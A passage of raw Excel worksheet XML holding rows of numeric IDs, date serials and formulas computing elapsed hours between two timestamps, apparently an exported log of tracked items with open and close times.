      <c r="A771" t="s">
        <v>2474</v>
      </c>
      <c r="B771">
        <v>12916</v>
      </c>
      <c r="C771" t="s">
        <v>2475</v>
      </c>
      <c r="D771" t="s">
        <v>7</v>
      </c>
      <c r="E771" s="1">
        <v>43498.10491898148</v>
      </c>
      <c r="F771" s="1">
        <v>43498.791655092595</v>
      </c>
      <c r="G771" t="s">
        <v>25</v>
      </c>
      <c r="H771" t="str">
        <f>TEXT(F771-E771,"[h]")</f>
        <v>16</v>
      </c>
    </row>
    <row r="772" spans="1:8" hidden="1">
      <c r="A772" t="s">
        <v>2476</v>
      </c>
      <c r="B772">
        <v>12915</v>
      </c>
      <c r="C772" t="s">
        <v>2477</v>
      </c>
      <c r="D772" t="s">
        <v>7</v>
      </c>
      <c r="E772" s="1">
        <v>43497.645740740743</v>
      </c>
      <c r="F772" s="1">
        <v>43620.193854166668</v>
      </c>
      <c r="G772" t="s">
        <v>37</v>
      </c>
      <c r="H772" t="str">
        <f>TEXT(F772-E772,"[h]")</f>
        <v>2941</v>
      </c>
    </row>
    <row r="773" spans="1:8" hidden="1">
      <c r="A773" t="s">
        <v>2478</v>
      </c>
      <c r="B773">
        <v>12913</v>
      </c>
      <c r="C773" t="s">
        <v>2479</v>
      </c>
      <c r="D773" t="s">
        <v>7</v>
      </c>
      <c r="E773" s="1">
        <v>43497.575902777775</v>
      </c>
      <c r="F773" s="1">
        <v>43498.731805555559</v>
      </c>
      <c r="G773" t="s">
        <v>66</v>
      </c>
      <c r="H773" t="str">
        <f>TEXT(F773-E773,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="774" spans="1:8">
      <c r="A774" t="s">
        <v>2480</v>
      </c>
      <c r="B774">
        <v>12912</v>
      </c>
      <c r="C774" t="s">
        <v>2481</v>
      </c>
      <c r="D774" t="s">
        <v>7</v>
      </c>
      <c r="E774" s="1">
        <v>43497.500543981485</v>
      </c>
      <c r="F774" s="1">
        <v>43498.769976851851</v>
      </c>
      <c r="G774" t="s">
        <v>2482</v>
      </c>
      <c r="H774" t="str">
        <f>TEXT(F774-E774,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="775" spans="1:8" hidden="1">
      <c r="A775" t="s">
        <v>2483</v>
      </c>
      <c r="B775">
        <v>12911</v>
      </c>
      <c r="C775" t="s">
        <v>2484</v>
      </c>
      <c r="D775" t="s">
        <v>7</v>
      </c>
      <c r="E775" s="1">
        <v>43497.21334490741</v>
      </c>
      <c r="F775" s="1">
        <v>43497.70752314815</v>
      </c>
      <c r="G775" t="s">
        <v>138</v>
      </c>
      <c r="H775" t="str">
        <f>TEXT(F775-E775,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="776" spans="1:8" hidden="1">
      <c r="A776" t="s">
        <v>2487</v>
      </c>
      <c r="B776">
        <v>12908</v>
      </c>
      <c r="C776" t="s">
        <v>2488</v>
      </c>
      <c r="D776" t="s">
        <v>7</v>
      </c>
      <c r="E776" s="1">
        <v>43497.014988425923</v>
      </c>
      <c r="F776" s="1">
        <v>43499.834907407407</v>
      </c>
      <c r="G776" t="s">
        <v>445</v>
      </c>
      <c r="H776" t="str">
        <f>TEXT(F776-E776,"[h]")</f>
        <v>67</v>
      </c>
    </row>
    <row r="777" spans="1:8" hidden="1">
      <c r="A777" t="s">
        <v>2489</v>
      </c>
      <c r="B777">
        <v>12907</v>
      </c>
      <c r="C777" t="s">
        <v>2490</v>
      </c>
      <c r="D777" t="s">
        <v>7</v>
      </c>
      <c r="E777" s="1">
        <v>43496.960659722223</v>
      </c>
      <c r="F777" s="1">
        <v>43525.973310185182</v>
      </c>
      <c r="G777" t="s">
        <v>1095</v>
      </c>
      <c r="H777" t="str">
        <f>TEXT(F777-E777,"[h]")</f>
        <v>696</v>
      </c>
    </row>
    <row r="778" spans="1:8">
      <c r="A778" t="s">
        <v>2491</v>
      </c>
      <c r="B778">
        <v>12905</v>
      </c>
      <c r="C778" t="s">
        <v>1647</v>
      </c>
      <c r="D778" t="s">
        <v>7</v>
      </c>
      <c r="E778" s="1">
        <v>43496.804583333331</v>
      </c>
      <c r="F778" s="1">
        <v>43624.251354166663</v>
      </c>
      <c r="G778" t="s">
        <v>16</v>
      </c>
      <c r="H778" t="str">
        <f>TEXT(F778-E778,"[h]")</f>
        <v>3058</v>
      </c>
    </row>
    <row r="779" spans="1:8" hidden="1">
      <c r="A779" t="s">
        <v>2485</v>
      </c>
      <c r="B779">
        <v>12903</v>
      </c>
      <c r="C779" t="s">
        <v>2486</v>
      </c>
      <c r="D779" t="s">
        <v>7</v>
      </c>
      <c r="E779" s="1">
        <v>43496.77747685185</v>
      </c>
      <c r="F779" s="1">
        <v>43496.86346064815</v>
      </c>
      <c r="G779" t="s">
        <v>55</v>
      </c>
      <c r="H779" t="str">
        <f>TEXT(F779-E779,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="780" spans="1:8" hidden="1">
      <c r="A780" t="s">
        <v>2492</v>
      </c>
      <c r="B780">
        <v>12902</v>
      </c>
      <c r="C780" t="s">
        <v>2493</v>
      </c>
      <c r="D780" t="s">
        <v>7</v>
      </c>
      <c r="E780" s="1">
        <v>43496.757233796299</v>
      </c>
      <c r="F780" s="1">
        <v>43496.858564814815</v>
      </c>
      <c r="G780" t="s">
        <v>90</v>
      </c>
      <c r="H780" t="str">
        <f>TEXT(F780-E780,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="781" spans="1:8">
      <c r="A781" t="s">
        <v>2498</v>
      </c>
      <c r="B781">
        <v>12897</v>
      </c>
      <c r="C781" t="s">
        <v>2499</v>
      </c>
      <c r="D781" t="s">
        <v>7</v>
      </c>
      <c r="E781" s="1">
        <v>43496.569085648145</v>
      </c>
      <c r="F781" s="1">
        <v>43548.220821759256</v>
      </c>
      <c r="G781" t="s">
        <v>2500</v>
      </c>
      <c r="H781" t="str">
        <f>TEXT(F781-E781,"[h]")</f>
        <v>1239</v>
      </c>
    </row>
    <row r="782" spans="1:8">
      <c r="A782" t="s">
        <v>2494</v>
      </c>
      <c r="B782">
        <v>12895</v>
      </c>
      <c r="C782" t="s">
        <v>2495</v>
      </c>
      <c r="D782" t="s">
        <v>7</v>
      </c>
      <c r="E782" s="1">
        <v>43496.300335648149</v>
      </c>
      <c r="F782" s="1">
        <v>43496.599930555552</v>
      </c>
      <c r="G782" t="s">
        <v>2264</v>
      </c>
      <c r="H782" t="str">
        <f>TEXT(F782-E782,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="783" spans="1:8" hidden="1">
      <c r="A783" t="s">
        <v>2501</v>
      </c>
      <c r="B783">
        <v>12894</v>
      </c>
      <c r="C783" t="s">
        <v>2502</v>
      </c>
      <c r="D783" t="s">
        <v>7</v>
      </c>
      <c r="E783" s="1">
        <v>43496.288090277776</v>
      </c>
      <c r="F783" s="1">
        <v>43500.016319444447</v>
      </c>
      <c r="G783" t="s">
        <v>1302</v>
      </c>
      <c r="H783" t="str">
        <f>TEXT(F783-E783,"[h]")</f>
        <v>89</v>
      </c>
    </row>
    <row r="784" spans="1:8">
      <c r="A784" t="s">
        <v>2503</v>
      </c>
      <c r="B784">
        <v>12893</v>
      </c>
      <c r="C784" t="s">
        <v>2504</v>
      </c>
      <c r="D784" t="s">
        <v>7</v>
      </c>
      <c r="E784" s="1">
        <v>43496.275914351849</v>
      </c>
      <c r="F784" s="1">
        <v>43496.599930555552</v>
      </c>
      <c r="G784" t="s">
        <v>2264</v>
      </c>
      <c r="H784" t="str">
        <f>TEXT(F784-E784,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="785" spans="1:8">
      <c r="A785" t="s">
        <v>2496</v>
      </c>
      <c r="B785">
        <v>12892</v>
      </c>
      <c r="C785" t="s">
        <v>2497</v>
      </c>
      <c r="D785" t="s">
        <v>7</v>
      </c>
      <c r="E785" s="1">
        <v>43496.150324074071</v>
      </c>
      <c r="F785" s="1">
        <v>43496.588969907411</v>
      </c>
      <c r="G785" t="s">
        <v>2264</v>
      </c>
      <c r="H785" t="str">
        <f>TEXT(F785-E785,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="786" spans="1:8" hidden="1">
      <c r="A786" t="s">
        <v>2507</v>
      </c>
      <c r="B786">
        <v>12890</v>
      </c>
      <c r="C786" t="s">
        <v>2508</v>
      </c>
      <c r="D786" t="s">
        <v>7</v>
      </c>
      <c r="E786" s="1">
        <v>43495.992326388892</v>
      </c>
      <c r="F786" s="1">
        <v>43496.019201388888</v>
      </c>
      <c r="G786" t="s">
        <v>2509</v>
      </c>
      <c r="H786" t="str">
        <f>TEXT(F786-E786,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="787" spans="1:8" hidden="1">
      <c r="A787" t="s">
        <v>2510</v>
      </c>
      <c r="B787">
        <v>12889</v>
      </c>
      <c r="C787" t="s">
        <v>1935</v>
      </c>
      <c r="D787" t="s">
        <v>7</v>
      </c>
      <c r="E787" s="1">
        <v>43495.938645833332</v>
      </c>
      <c r="F787" s="1">
        <v>43572.236203703702</v>
      </c>
      <c r="G787" t="s">
        <v>1031</v>
      </c>
      <c r="H787" t="str">
        <f>TEXT(F787-E787,"[h]")</f>
        <v>1831</v>
      </c>
    </row>
    <row r="788" spans="1:8">
      <c r="A788" t="s">
        <v>2511</v>
      </c>
      <c r="B788">
        <v>12887</v>
      </c>
      <c r="C788" t="s">
        <v>2512</v>
      </c>
      <c r="D788" t="s">
        <v>7</v>
      </c>
      <c r="E788" s="1">
        <v>43495.861597222225</v>
      </c>
      <c r="F788" s="1">
        <v>43539.231261574074</v>
      </c>
      <c r="G788" t="s">
        <v>16</v>
      </c>
      <c r="H788" t="str">
        <f>TEXT(F788-E788,"[h]")</f>
        <v>1040</v>
      </c>
    </row>
    <row r="789" spans="1:8" hidden="1">
      <c r="A789" t="s">
        <v>2513</v>
      </c>
      <c r="B789">
        <v>12885</v>
      </c>
      <c r="C789" t="s">
        <v>2514</v>
      </c>
      <c r="D789" t="s">
        <v>7</v>
      </c>
      <c r="E789" s="1">
        <v>43495.772870370369</v>
      </c>
      <c r="F789" s="1">
        <v>43516.281793981485</v>
      </c>
      <c r="G789" t="s">
        <v>1762</v>
      </c>
      <c r="H789" t="str">
        <f>TEXT(F789-E789,"[h]")</f>
        <v>492</v>
      </c>
    </row>
    <row r="790" spans="1:8" hidden="1">
      <c r="A790" t="s">
        <v>2515</v>
      </c>
      <c r="B790">
        <v>12883</v>
      </c>
      <c r="C790" t="s">
        <v>2516</v>
      </c>
      <c r="D790" t="s">
        <v>7</v>
      </c>
      <c r="E790" s="1">
        <v>43495.704328703701</v>
      </c>
      <c r="F790" s="1">
        <v>43496.256006944444</v>
      </c>
      <c r="G790" t="s">
        <v>55</v>
      </c>
      <c r="H790" t="str">
        <f>TEXT(F790-E790,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="791" spans="1:8" hidden="1">
      <c r="A791" t="s">
        <v>2517</v>
      </c>
      <c r="B791">
        <v>12882</v>
      </c>
      <c r="C791" t="s">
        <v>2518</v>
      </c>
      <c r="D791" t="s">
        <v>7</v>
      </c>
      <c r="E791" s="1">
        <v>43495.590567129628</v>
      </c>
      <c r="F791" s="1">
        <v>43496.588969907411</v>
      </c>
      <c r="G791" t="s">
        <v>109</v>
      </c>
      <c r="H791" t="str">
        <f>TEXT(F791-E791,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="792" spans="1:8" hidden="1">
      <c r="A792" t="s">
        <v>2519</v>
      </c>
      <c r="B792">
        <v>12880</v>
      </c>
      <c r="C792" t="s">
        <v>2520</v>
      </c>
      <c r="D792" t="s">
        <v>7</v>
      </c>
      <c r="E792" s="1">
        <v>43495.469340277778</v>
      </c>
      <c r="F792" s="1">
        <v>43537.848043981481</v>
      </c>
      <c r="G792" t="s">
        <v>2521</v>
      </c>
      <c r="H792" t="str">
        <f>TEXT(F792-E792,"[h]")</f>
        <v>1017</v>
      </c>
    </row>
    <row r="793" spans="1:8" hidden="1">
      <c r="A793" t="s">
        <v>2522</v>
      </c>
      <c r="B793">
        <v>12879</v>
      </c>
      <c r="C793" t="s">
        <v>2523</v>
      </c>
      <c r="D793" t="s">
        <v>7</v>
      </c>
      <c r="E793" s="1">
        <v>43495.461875000001</v>
      </c>
      <c r="F793" s="1">
        <v>43537.906921296293</v>
      </c>
      <c r="G793" t="s">
        <v>2521</v>
      </c>
      <c r="H793" t="str">
        <f>TEXT(F793-E793,"[h]")</f>
        <v>1018</v>
      </c>
    </row>
    <row r="794" spans="1:8" hidden="1">
      <c r="A794" t="s">
        <v>2524</v>
      </c>
      <c r="B794">
        <v>12877</v>
      </c>
      <c r="C794" t="s">
        <v>2525</v>
      </c>
      <c r="D794" t="s">
        <v>7</v>
      </c>
      <c r="E794" s="1">
        <v>43495.178379629629</v>
      </c>
      <c r="F794" s="1">
        <v>43495.725011574075</v>
      </c>
      <c r="G794" t="s">
        <v>55</v>
      </c>
      <c r="H794" t="str">
        <f>TEXT(F794-E794,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="795" spans="1:8" hidden="1">
      <c r="A795" t="s">
        <v>2526</v>
      </c>
      <c r="B795">
        <v>12875</v>
      </c>
      <c r="C795" t="s">
        <v>2527</v>
      </c>
      <c r="D795" t="s">
        <v>7</v>
      </c>
      <c r="E795" s="1">
        <v>43494.723819444444</v>
      </c>
      <c r="F795" s="1">
        <v>43494.753032407411</v>
      </c>
      <c r="G795" t="s">
        <v>251</v>
      </c>
      <c r="H795" t="str">
        <f>TEXT(F795-E795,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="796" spans="1:8" hidden="1">
      <c r="A796" t="s">
        <v>2528</v>
      </c>
      <c r="B796">
        <v>12871</v>
      </c>
      <c r="C796" t="s">
        <v>2529</v>
      </c>
      <c r="D796" t="s">
        <v>7</v>
      </c>
      <c r="E796" s="1">
        <v>43493.679050925923</v>
      </c>
      <c r="F796" s="1">
        <v>43495.753657407404</v>
      </c>
      <c r="G796" t="s">
        <v>37</v>
      </c>
      <c r="H796" t="str">
        <f>TEXT(F796-E796,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="797" spans="1:8" hidden="1">
      <c r="A797" t="s">
        <v>1772</v>
      </c>
      <c r="B797">
        <v>12867</v>
      </c>
      <c r="C797" t="s">
        <v>2535</v>
      </c>
      <c r="D797" t="s">
        <v>7</v>
      </c>
      <c r="E797" s="1">
        <v>43492.665891203702</v>
      </c>
      <c r="F797" s="1">
        <v>43493.160069444442</v>
      </c>
      <c r="G797" t="s">
        <v>55</v>
      </c>
      <c r="H797" t="str">
        <f>TEXT(F797-E797,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="798" spans="1:8" hidden="1">
      <c r="A798" t="s">
        <v>2536</v>
      </c>
      <c r="B798">
        <v>12866</v>
      </c>
      <c r="C798" t="s">
        <v>2537</v>
      </c>
      <c r="D798" t="s">
        <v>7</v>
      </c>
      <c r="E798" s="1">
        <v>43492.600312499999</v>
      </c>
      <c r="F798" s="1">
        <v>43492.654675925929</v>
      </c>
      <c r="G798" t="s">
        <v>2538</v>
      </c>
      <c r="H798" t="str">
        <f>TEXT(F798-E798,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="799" spans="1:8">
      <c r="A799" t="s">
        <v>2533</v>
      </c>
      <c r="B799">
        <v>12863</v>
      </c>
      <c r="C799" t="s">
        <v>2534</v>
      </c>
      <c r="D799" t="s">
        <v>7</v>
      </c>
      <c r="E799" s="1">
        <v>43492.383206018516</v>
      </c>
      <c r="F799" s="1">
        <v>43492.538842592592</v>
      </c>
      <c r="G799" t="s">
        <v>1709</v>
      </c>
      <c r="H799" t="str">
        <f>TEXT(F799-E799,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="800" spans="1:8">
      <c r="A800" t="s">
        <v>2539</v>
      </c>
      <c r="B800">
        <v>12862</v>
      </c>
      <c r="C800" t="s">
        <v>2540</v>
      </c>
      <c r="D800" t="s">
        <v>7</v>
      </c>
      <c r="E800" s="1">
        <v>43491.950810185182</v>
      </c>
      <c r="F800" s="1">
        <v>43607.957638888889</v>
      </c>
      <c r="G800" t="s">
        <v>25</v>
      </c>
      <c r="H800" t="str">
        <f>TEXT(F800-E800,"[h]")</f>
        <v>2784</v>
      </c>
    </row>
    <row r="801" spans="1:8" hidden="1">
      <c r="A801" t="s">
        <v>2541</v>
      </c>
      <c r="B801">
        <v>12857</v>
      </c>
      <c r="C801" t="s">
        <v>2542</v>
      </c>
      <c r="D801" t="s">
        <v>7</v>
      </c>
      <c r="E801" s="1">
        <v>43491.179375</v>
      </c>
      <c r="F801" s="1">
        <v>43495.402222222219</v>
      </c>
      <c r="G801" t="s">
        <v>2543</v>
      </c>
      <c r="H801" t="str">
        <f>TEXT(F801-E801,"[h]")</f>
        <v>101</v>
      </c>
    </row>
    <row r="802" spans="1:8">
      <c r="A802" t="s">
        <v>1772</v>
      </c>
      <c r="B802">
        <v>12854</v>
      </c>
      <c r="C802" t="s">
        <v>2530</v>
      </c>
      <c r="D802" t="s">
        <v>7</v>
      </c>
      <c r="E802" s="1">
        <v>43491.075578703705</v>
      </c>
      <c r="F802" s="1">
        <v>43491.134131944447</v>
      </c>
      <c r="G802" t="s">
        <v>16</v>
      </c>
      <c r="H802" t="str">
        <f>TEXT(F802-E802,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="803" spans="1:8" hidden="1">
      <c r="A803" t="s">
        <v>2544</v>
      </c>
      <c r="B803">
        <v>12851</v>
      </c>
      <c r="C803" t="s">
        <v>2545</v>
      </c>
      <c r="D803" t="s">
        <v>7</v>
      </c>
      <c r="E803" s="1">
        <v>43490.593356481484</v>
      </c>
      <c r="F803" s="1">
        <v>43490.830312500002</v>
      </c>
      <c r="G803" t="s">
        <v>55</v>
      </c>
      <c r="H803" t="str">
        <f>TEXT(F803-E803,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="804" spans="1:8">
      <c r="A804" t="s">
        <v>2505</v>
      </c>
      <c r="B804">
        <v>12850</v>
      </c>
      <c r="C804" t="s">
        <v>2506</v>
      </c>
      <c r="D804" t="s">
        <v>7</v>
      </c>
      <c r="E804" s="1">
        <v>43490.578750000001</v>
      </c>
      <c r="F804" s="1">
        <v>43495.987696759257</v>
      </c>
      <c r="G804" t="s">
        <v>16</v>
      </c>
      <c r="H804" t="str">
        <f>TEXT(F804-E804,"[h]")</f>
        <v>129</v>
      </c>
    </row>
    <row r="805" spans="1:8">
      <c r="A805" t="s">
        <v>2546</v>
      </c>
      <c r="B805">
        <v>12849</v>
      </c>
      <c r="C805" t="s">
        <v>2547</v>
      </c>
      <c r="D805" t="s">
        <v>7</v>
      </c>
      <c r="E805" s="1">
        <v>43490.457175925927</v>
      </c>
      <c r="F805" s="1">
        <v>43537.849189814813</v>
      </c>
      <c r="G805" t="s">
        <v>1709</v>
      </c>
      <c r="H805" t="str">
        <f>TEXT(F805-E805,"[h]")</f>
        <v>1137</v>
      </c>
    </row>
    <row r="806" spans="1:8">
      <c r="A806" t="s">
        <v>2548</v>
      </c>
      <c r="B806">
        <v>12846</v>
      </c>
      <c r="C806" t="s">
        <v>2549</v>
      </c>
      <c r="D806" t="s">
        <v>7</v>
      </c>
      <c r="E806" s="1">
        <v>43489.883125</v>
      </c>
      <c r="F806" s="1">
        <v>43518.830451388887</v>
      </c>
      <c r="G806" t="s">
        <v>2550</v>
      </c>
      <c r="H806" t="str">
        <f>TEXT(F806-E806,"[h]")</f>
        <v>694</v>
      </c>
    </row>
    <row r="807" spans="1:8">
      <c r="A807" t="s">
        <v>2551</v>
      </c>
      <c r="B807">
        <v>12845</v>
      </c>
      <c r="C807" t="s">
        <v>2552</v>
      </c>
      <c r="D807" t="s">
        <v>7</v>
      </c>
      <c r="E807" s="1">
        <v>43489.735937500001</v>
      </c>
      <c r="F807" s="1">
        <v>43489.986504629633</v>
      </c>
      <c r="G807" t="s">
        <v>98</v>
      </c>
      <c r="H807" t="str">
        <f>TEXT(F807-E807,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="808" spans="1:8">
      <c r="A808" t="s">
        <v>2553</v>
      </c>
      <c r="B808">
        <v>12844</v>
      </c>
      <c r="C808" t="s">
        <v>2554</v>
      </c>
      <c r="D808" t="s">
        <v>7</v>
      </c>
      <c r="E808" s="1">
        <v>43489.732789351852</v>
      </c>
      <c r="F808" s="1">
        <v>43489.986284722225</v>
      </c>
      <c r="G808" t="s">
        <v>98</v>
      </c>
      <c r="H808" t="str">
        <f>TEXT(F808-E808,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="809" spans="1:8">
      <c r="A809" t="s">
        <v>2531</v>
      </c>
      <c r="B809">
        <v>12842</v>
      </c>
      <c r="C809" t="s">
        <v>2532</v>
      </c>
      <c r="D809" t="s">
        <v>7</v>
      </c>
      <c r="E809" s="1">
        <v>43489.661261574074</v>
      </c>
      <c r="F809" s="1">
        <v>43492.78025462963</v>
      </c>
      <c r="G809" t="s">
        <v>16</v>
      </c>
      <c r="H809" t="str">
        <f>TEXT(F809-E809,"[h]")</f>
        <v>74</v>
      </c>
    </row>
    <row r="810" spans="1:8">
      <c r="A810" t="s">
        <v>2557</v>
      </c>
      <c r="B810">
        <v>12841</v>
      </c>
      <c r="C810" t="s">
        <v>2558</v>
      </c>
      <c r="D810" t="s">
        <v>7</v>
      </c>
      <c r="E810" s="1">
        <v>43489.332187499997</v>
      </c>
      <c r="F810" s="1">
        <v>43518.830451388887</v>
      </c>
      <c r="G810" t="s">
        <v>2550</v>
      </c>
      <c r="H810" t="str">
        <f>TEXT(F810-E810,"[h]")</f>
        <v>707</v>
      </c>
    </row>
    <row r="811" spans="1:8" hidden="1">
      <c r="A811" t="s">
        <v>2559</v>
      </c>
      <c r="B811">
        <v>12839</v>
      </c>
      <c r="C811" t="s">
        <v>2560</v>
      </c>
      <c r="D811" t="s">
        <v>7</v>
      </c>
      <c r="E811" s="1">
        <v>43488.979050925926</v>
      </c>
      <c r="F811" s="1">
        <v>43489.827650462961</v>
      </c>
      <c r="G811" t="s">
        <v>138</v>
      </c>
      <c r="H811" t="str">
        <f>TEXT(F811-E811,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="812" spans="1:8">
      <c r="A812" t="s">
        <v>2561</v>
      </c>
      <c r="B812">
        <v>12837</v>
      </c>
      <c r="C812" t="s">
        <v>2562</v>
      </c>
      <c r="D812" t="s">
        <v>7</v>
      </c>
      <c r="E812" s="1">
        <v>43488.881319444445</v>
      </c>
      <c r="F812" s="1">
        <v>43492.780243055553</v>
      </c>
      <c r="G812" t="s">
        <v>16</v>
      </c>
      <c r="H812" t="str">
        <f>TEXT(F812-E812,"[h]")</f>
        <v>93</v>
      </c>
    </row>
    <row r="813" spans="1:8">
      <c r="A813" t="s">
        <v>2563</v>
      </c>
      <c r="B813">
        <v>12835</v>
      </c>
      <c r="C813" t="s">
        <v>2564</v>
      </c>
      <c r="D813" t="s">
        <v>7</v>
      </c>
      <c r="E813" s="1">
        <v>43488.795868055553</v>
      </c>
      <c r="F813" s="1">
        <v>43488.846956018519</v>
      </c>
      <c r="G813" t="s">
        <v>16</v>
      </c>
      <c r="H813" t="str">
        <f>TEXT(F813-E813,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="814" spans="1:8" hidden="1">
      <c r="A814" t="s">
        <v>2565</v>
      </c>
      <c r="B814">
        <v>12834</v>
      </c>
      <c r="C814" t="s">
        <v>2566</v>
      </c>
      <c r="D814" t="s">
        <v>7</v>
      </c>
      <c r="E814" s="1">
        <v>43488.774155092593</v>
      </c>
      <c r="F814" s="1">
        <v>43617.823148148149</v>
      </c>
      <c r="G814" t="s">
        <v>2567</v>
      </c>
      <c r="H814" t="str">
        <f>TEXT(F814-E814,"[h]")</f>
        <v>3097</v>
      </c>
    </row>
    <row r="815" spans="1:8" hidden="1">
      <c r="A815" t="s">
        <v>2568</v>
      </c>
      <c r="B815">
        <v>12832</v>
      </c>
      <c r="C815" t="s">
        <v>2569</v>
      </c>
      <c r="D815" t="s">
        <v>7</v>
      </c>
      <c r="E815" s="1">
        <v>43488.536423611113</v>
      </c>
      <c r="F815" s="1">
        <v>43488.605833333335</v>
      </c>
      <c r="G815" t="s">
        <v>2570</v>
      </c>
      <c r="H815" t="str">
        <f>TEXT(F815-E815,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="816" spans="1:8">
      <c r="A816" t="s">
        <v>2571</v>
      </c>
      <c r="B816">
        <v>12831</v>
      </c>
      <c r="C816" t="s">
        <v>1692</v>
      </c>
      <c r="D816" t="s">
        <v>7</v>
      </c>
      <c r="E816" s="1">
        <v>43488.329687500001</v>
      </c>
      <c r="F816" s="1">
        <v>43518.316111111111</v>
      </c>
      <c r="G816" t="s">
        <v>2264</v>
      </c>
      <c r="H816" t="str">
        <f>TEXT(F816-E816,"[h]")</f>
        <v>719</v>
      </c>
    </row>
    <row r="817" spans="1:8" hidden="1">
      <c r="A817" t="s">
        <v>2572</v>
      </c>
      <c r="B817">
        <v>12830</v>
      </c>
      <c r="C817" t="s">
        <v>2573</v>
      </c>
      <c r="D817" t="s">
        <v>7</v>
      </c>
      <c r="E817" s="1">
        <v>43487.927754629629</v>
      </c>
      <c r="F817" s="1">
        <v>43488.291828703703</v>
      </c>
      <c r="G817" t="s">
        <v>37</v>
      </c>
      <c r="H817" t="str">
        <f>TEXT(F817-E817,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="818" spans="1:8" hidden="1">
      <c r="A818" t="s">
        <v>2574</v>
      </c>
      <c r="B818">
        <v>12829</v>
      </c>
      <c r="C818" t="s">
        <v>2575</v>
      </c>
      <c r="D818" t="s">
        <v>7</v>
      </c>
      <c r="E818" s="1">
        <v>43487.849942129629</v>
      </c>
      <c r="F818" s="1">
        <v>43730.156817129631</v>
      </c>
      <c r="G818" t="s">
        <v>2576</v>
      </c>
      <c r="H818" t="str">
        <f>TEXT(F818-E818,"[h]")</f>
        <v>5815</v>
      </c>
    </row>
    <row r="819" spans="1:8" hidden="1">
      <c r="A819" t="s">
        <v>2577</v>
      </c>
      <c r="B819">
        <v>12828</v>
      </c>
      <c r="C819" t="s">
        <v>2578</v>
      </c>
      <c r="D819" t="s">
        <v>7</v>
      </c>
      <c r="E819" s="1">
        <v>43487.83871527778</v>
      </c>
      <c r="F819" s="1">
        <v>43726.318611111114</v>
      </c>
      <c r="G819" t="s">
        <v>2579</v>
      </c>
      <c r="H819" t="str">
        <f>TEXT(F819-E819,"[h]")</f>
        <v>5723</v>
      </c>
    </row>
    <row r="820" spans="1:8">
      <c r="A820" t="s">
        <v>2580</v>
      </c>
      <c r="B820">
        <v>12827</v>
      </c>
      <c r="C820" t="s">
        <v>2581</v>
      </c>
      <c r="D820" t="s">
        <v>7</v>
      </c>
      <c r="E820" s="1">
        <v>43487.827800925923</v>
      </c>
      <c r="F820" s="1">
        <v>43731.231273148151</v>
      </c>
      <c r="G820" t="s">
        <v>112</v>
      </c>
      <c r="H820" t="str">
        <f>TEXT(F820-E820,"[h]")</f>
        <v>5841</v>
      </c>
    </row>
    <row r="821" spans="1:8">
      <c r="A821" t="s">
        <v>2555</v>
      </c>
      <c r="B821">
        <v>12824</v>
      </c>
      <c r="C821" t="s">
        <v>2556</v>
      </c>
      <c r="D821" t="s">
        <v>7</v>
      </c>
      <c r="E821" s="1">
        <v>43487.373310185183</v>
      </c>
      <c r="F821" s="1">
        <v>43488.752349537041</v>
      </c>
      <c r="G821" t="s">
        <v>126</v>
      </c>
      <c r="H821" t="str">
        <f>TEXT(F821-E821,"[h]")</f>
        <v>33</v>
      </c>
    </row>
    <row r="822" spans="1:8">
      <c r="A822" t="s">
        <v>2582</v>
      </c>
      <c r="B822">
        <v>12820</v>
      </c>
      <c r="C822" t="s">
        <v>2583</v>
      </c>
      <c r="D822" t="s">
        <v>7</v>
      </c>
      <c r="E822" s="1">
        <v>43486.983946759261</v>
      </c>
      <c r="F822" s="1">
        <v>43487.135381944441</v>
      </c>
      <c r="G822" t="s">
        <v>2584</v>
      </c>
      <c r="H822" t="str">
        <f>TEXT(F822-E822,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="823" spans="1:8">
      <c r="A823" t="s">
        <v>2585</v>
      </c>
      <c r="B823">
        <v>12819</v>
      </c>
      <c r="C823" t="s">
        <v>2586</v>
      </c>
      <c r="D823" t="s">
        <v>7</v>
      </c>
      <c r="E823" s="1">
        <v>43486.917129629626</v>
      </c>
      <c r="F823" s="1">
        <v>43486.990555555552</v>
      </c>
      <c r="G823" t="s">
        <v>169</v>
      </c>
      <c r="H823" t="str">
        <f>TEXT(F823-E823,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="824" spans="1:8" hidden="1">
      <c r="A824" t="s">
        <v>2587</v>
      </c>
      <c r="B824">
        <v>12818</v>
      </c>
      <c r="C824" t="s">
        <v>2588</v>
      </c>
      <c r="D824" t="s">
        <v>7</v>
      </c>
      <c r="E824" s="1">
        <v>43486.910462962966</v>
      </c>
      <c r="F824" s="1">
        <v>43488.476898148147</v>
      </c>
      <c r="G824" t="s">
        <v>66</v>
      </c>
      <c r="H824" t="str">
        <f>TEXT(F824-E824,"[h]")</f>
        <v>37</v>
      </c>
    </row>
    <row r="825" spans="1:8">
      <c r="A825" t="s">
        <v>2591</v>
      </c>
      <c r="B825">
        <v>12815</v>
      </c>
      <c r="C825" t="s">
        <v>2592</v>
      </c>
      <c r="D825" t="s">
        <v>7</v>
      </c>
      <c r="E825" s="1">
        <v>43485.965578703705</v>
      </c>
      <c r="F825" s="1">
